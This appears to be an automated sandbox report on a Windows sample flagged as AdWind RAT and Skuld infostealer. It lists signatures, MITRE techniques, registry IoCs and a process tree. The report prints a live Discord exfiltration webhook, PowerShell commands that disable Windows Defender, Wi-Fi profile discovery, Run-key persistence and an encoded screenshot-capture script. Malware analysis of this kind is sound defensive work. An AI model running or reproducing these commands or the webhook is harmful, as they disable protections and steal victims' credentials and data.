adwind | 1ecd797d5056faf5829c5e29538e898b76a6f0e0716d0a6a0ccde0b287450b2f

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
28-06-2024 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

megre.exe
Size

4.3MB
MD5

85dceadb1bd64dbfa1ae239cb92c21a9
SHA1

f71b846525a41c474769a0e7e12a526b9352f0cc
SHA256

1ecd797d5056faf5829c5e29538e898b76a6f0e0716d0a6a0ccde0b287450b2f
SHA512

19238aa72a123d72263db531c4e84ee7035f411ce6a4f7ca763170c2f37df4f4c79b7caf299d47f4ebd3f782f3e2f1f61412060d362c6a5eb6d2dd846340ae8c
SSDEEP

98304:pInwwYFiFsL5JSgwY2bb+YIqdhMnaKrvBFyQQez:pUwwsL/SSE6YbMJJwQQez

Score

10^/10

adwind skuld discovery execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1256088784949215303/WbNGmjP1oWYHf73DLWcGmirMGggTyKkhmk7TEi81oeSTOQ3ZMo631rf3-QXvJw6dp6pf

Signatures

AdWind
A Java-based RAT family operated as malware-as-a-service.
trojan adwind

Class file contains resources related to AdWind 1 IoCs

resource	yara_rule
sample	family_adwind4

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4108	powershell.exe
4456	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	skuld.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	megre.exe

Executes dropped EXE 1 IoCs

pid	Process
3780	skuld.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4436	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Home = "C:\\Program Files\\Java\\jre-1.8\\bin\\javaw.exe -jar C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\.tmp\\1719558075586.tmp"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	skuld.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
12	discord.com
13	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	api.ipify.org
8	api.ipify.org
10	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	skuld.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	skuld.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4268	wmic.exe
1016	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	11	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
1620	taskkill.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	skuld.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	skuld.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	skuld.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
4108	powershell.exe
4108	powershell.exe
3780	skuld.exe
3780	skuld.exe
4108	powershell.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
912	powershell.exe
912	powershell.exe
3780	skuld.exe
3780	skuld.exe
912	powershell.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe
3780	skuld.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3780	skuld.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1568	wmic.exe
Token: SeSecurityPrivilege	1568	wmic.exe
Token: SeTakeOwnershipPrivilege	1568	wmic.exe
Token: SeLoadDriverPrivilege	1568	wmic.exe
Token: SeSystemProfilePrivilege	1568	wmic.exe
Token: SeSystemtimePrivilege	1568	wmic.exe
Token: SeProfSingleProcessPrivilege	1568	wmic.exe
Token: SeIncBasePriorityPrivilege	1568	wmic.exe
Token: SeCreatePagefilePrivilege	1568	wmic.exe
Token: SeBackupPrivilege	1568	wmic.exe
Token: SeRestorePrivilege	1568	wmic.exe
Token: SeShutdownPrivilege	1568	wmic.exe
Token: SeDebugPrivilege	1568	wmic.exe
Token: SeSystemEnvironmentPrivilege	1568	wmic.exe
Token: SeRemoteShutdownPrivilege	1568	wmic.exe
Token: SeUndockPrivilege	1568	wmic.exe
Token: SeManageVolumePrivilege	1568	wmic.exe
Token: 33	1568	wmic.exe
Token: 34	1568	wmic.exe
Token: 35	1568	wmic.exe
Token: 36	1568	wmic.exe
Token: SeIncreaseQuotaPrivilege	1568	wmic.exe
Token: SeSecurityPrivilege	1568	wmic.exe
Token: SeTakeOwnershipPrivilege	1568	wmic.exe
Token: SeLoadDriverPrivilege	1568	wmic.exe
Token: SeSystemProfilePrivilege	1568	wmic.exe
Token: SeSystemtimePrivilege	1568	wmic.exe
Token: SeProfSingleProcessPrivilege	1568	wmic.exe
Token: SeIncBasePriorityPrivilege	1568	wmic.exe
Token: SeCreatePagefilePrivilege	1568	wmic.exe
Token: SeBackupPrivilege	1568	wmic.exe
Token: SeRestorePrivilege	1568	wmic.exe
Token: SeShutdownPrivilege	1568	wmic.exe
Token: SeDebugPrivilege	1568	wmic.exe
Token: SeSystemEnvironmentPrivilege	1568	wmic.exe
Token: SeRemoteShutdownPrivilege	1568	wmic.exe
Token: SeUndockPrivilege	1568	wmic.exe
Token: SeManageVolumePrivilege	1568	wmic.exe
Token: 33	1568	wmic.exe
Token: 34	1568	wmic.exe
Token: 35	1568	wmic.exe
Token: 36	1568	wmic.exe
Token: SeIncreaseQuotaPrivilege	4268	wmic.exe
Token: SeSecurityPrivilege	4268	wmic.exe
Token: SeTakeOwnershipPrivilege	4268	wmic.exe
Token: SeLoadDriverPrivilege	4268	wmic.exe
Token: SeSystemProfilePrivilege	4268	wmic.exe
Token: SeSystemtimePrivilege	4268	wmic.exe
Token: SeProfSingleProcessPrivilege	4268	wmic.exe
Token: SeIncBasePriorityPrivilege	4268	wmic.exe
Token: SeCreatePagefilePrivilege	4268	wmic.exe
Token: SeBackupPrivilege	4268	wmic.exe
Token: SeRestorePrivilege	4268	wmic.exe
Token: SeShutdownPrivilege	4268	wmic.exe
Token: SeDebugPrivilege	4268	wmic.exe
Token: SeSystemEnvironmentPrivilege	4268	wmic.exe
Token: SeRemoteShutdownPrivilege	4268	wmic.exe
Token: SeUndockPrivilege	4268	wmic.exe
Token: SeManageVolumePrivilege	4268	wmic.exe
Token: 33	4268	wmic.exe
Token: 34	4268	wmic.exe
Token: 35	4268	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2432	java.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5100 wrote to memory of 4004	5100	megre.exe	82
PID 5100 wrote to memory of 4004	5100	megre.exe	82
PID 5100 wrote to memory of 4004	5100	megre.exe	82
PID 4004 wrote to memory of 2036	4004	cmd.exe	85
PID 4004 wrote to memory of 2036	4004	cmd.exe	85
PID 4004 wrote to memory of 2036	4004	cmd.exe	85
PID 4004 wrote to memory of 468	4004	cmd.exe	86
PID 4004 wrote to memory of 468	4004	cmd.exe	86
PID 4004 wrote to memory of 468	4004	cmd.exe	86
PID 4004 wrote to memory of 2656	4004	cmd.exe	87
PID 4004 wrote to memory of 2656	4004	cmd.exe	87
PID 4004 wrote to memory of 2656	4004	cmd.exe	87
PID 4004 wrote to memory of 2932	4004	cmd.exe	88
PID 4004 wrote to memory of 2932	4004	cmd.exe	88
PID 4004 wrote to memory of 2932	4004	cmd.exe	88
PID 4004 wrote to memory of 2392	4004	cmd.exe	89
PID 4004 wrote to memory of 2392	4004	cmd.exe	89
PID 4004 wrote to memory of 2392	4004	cmd.exe	89
PID 468 wrote to memory of 3396	468	cmd.exe	90
PID 468 wrote to memory of 3396	468	cmd.exe	90
PID 468 wrote to memory of 3396	468	cmd.exe	90
PID 2656 wrote to memory of 3160	2656	cmd.exe	93
PID 2656 wrote to memory of 3160	2656	cmd.exe	93
PID 2656 wrote to memory of 3160	2656	cmd.exe	93
PID 2036 wrote to memory of 3780	2036	cmd.exe	92
PID 2036 wrote to memory of 3780	2036	cmd.exe	92
PID 2392 wrote to memory of 4992	2392	cmd.exe	96
PID 2392 wrote to memory of 4992	2392	cmd.exe	96
PID 2392 wrote to memory of 4992	2392	cmd.exe	96
PID 3396 wrote to memory of 868	3396	cmd.exe	98
PID 3396 wrote to memory of 868	3396	cmd.exe	98
PID 3396 wrote to memory of 868	3396	cmd.exe	98
PID 2932 wrote to memory of 2432	2932	cmd.exe	97
PID 2932 wrote to memory of 2432	2932	cmd.exe	97
PID 3780 wrote to memory of 3368	3780	skuld.exe	101
PID 3780 wrote to memory of 3368	3780	skuld.exe	101
PID 4992 wrote to memory of 1620	4992	cmd.exe	103
PID 4992 wrote to memory of 1620	4992	cmd.exe	103
PID 4992 wrote to memory of 1620	4992	cmd.exe	103
PID 3780 wrote to memory of 4704	3780	skuld.exe	106
PID 3780 wrote to memory of 4704	3780	skuld.exe	106
PID 2432 wrote to memory of 4436	2432	java.exe	109
PID 2432 wrote to memory of 4436	2432	java.exe	109
PID 3780 wrote to memory of 1568	3780	skuld.exe	111
PID 3780 wrote to memory of 1568	3780	skuld.exe	111
PID 3780 wrote to memory of 4268	3780	skuld.exe	113
PID 3780 wrote to memory of 4268	3780	skuld.exe	113
PID 3780 wrote to memory of 4108	3780	skuld.exe	115
PID 3780 wrote to memory of 4108	3780	skuld.exe	115
PID 2432 wrote to memory of 2612	2432	java.exe	116
PID 2432 wrote to memory of 2612	2432	java.exe	116
PID 2432 wrote to memory of 864	2432	java.exe	119
PID 2432 wrote to memory of 864	2432	java.exe	119
PID 3780 wrote to memory of 1660	3780	skuld.exe	121
PID 3780 wrote to memory of 1660	3780	skuld.exe	121
PID 864 wrote to memory of 2224	864	cmd.exe	123
PID 864 wrote to memory of 2224	864	cmd.exe	123
PID 3780 wrote to memory of 116	3780	skuld.exe	124
PID 3780 wrote to memory of 116	3780	skuld.exe	124
PID 3780 wrote to memory of 912	3780	skuld.exe	126
PID 3780 wrote to memory of 912	3780	skuld.exe	126
PID 3780 wrote to memory of 1016	3780	skuld.exe	128
PID 3780 wrote to memory of 1016	3780	skuld.exe	128
PID 3780 wrote to memory of 408	3780	skuld.exe	130

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3368	attrib.exe
4704	attrib.exe
2612	attrib.exe
408	attrib.exe
4028	attrib.exe

C:\Users\Admin\AppData\Local\Temp\megre.exe
"C:\Users\Admin\AppData\Local\Temp\megre.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4004
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Maps connected drives based on registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3780
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
        5⤵
        Views/modifies file attributes
        
        PID:3368
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        5⤵
        Views/modifies file attributes
        
        PID:4704
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:4268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4108
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        5⤵
        
        PID:1660
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name
        5⤵
        
        PID:116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:912
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1016
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:408
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4028
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:4696
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQA